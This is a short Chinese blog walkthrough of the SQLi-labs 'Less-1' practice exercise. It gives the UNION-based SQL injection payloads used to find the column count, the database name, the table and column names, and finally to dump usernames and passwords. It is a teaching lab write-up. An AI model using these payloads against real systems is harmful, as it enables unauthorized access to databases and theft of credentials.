首页 > 其他 > 详细

Less-1

时间:2020-05-16 23:36:27      阅读:71      评论:0      收藏:0      [点我收藏+]

GET_单引号_字符型注入

0x01 判断注入类型

?id=1
?id=1‘
?id=1"

‘单引号报错
to use near ‘‘1‘‘ LIMIT 0,1‘ at line 1
‘1‘‘ LIMIT 0,1
‘1‘‘
输入的单引号写入了查询语句

存在,GET,单引号注入

0x02 获取回显字段数

?id=1‘order by 4--+
报错,说明有3列

技术分享图片

0x03 获取数据库名

?id=-1‘union select 1,database(),user()--+
得到security数据库

技术分享图片

0x04 获取表名

?id=-1‘union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"--+

技术分享图片

0x05 获取列名

?id=-1‘union select 1,2,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security"--+

技术分享图片

0x06 获取数据

?id=-1‘union select 1,2,group_concat(username,password) from users--+

技术分享图片

参考链接:
https://www.jianshu.com/p/b5ab19751955

Less-1

原文:https://www.cnblogs.com/observering/p/12902346.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!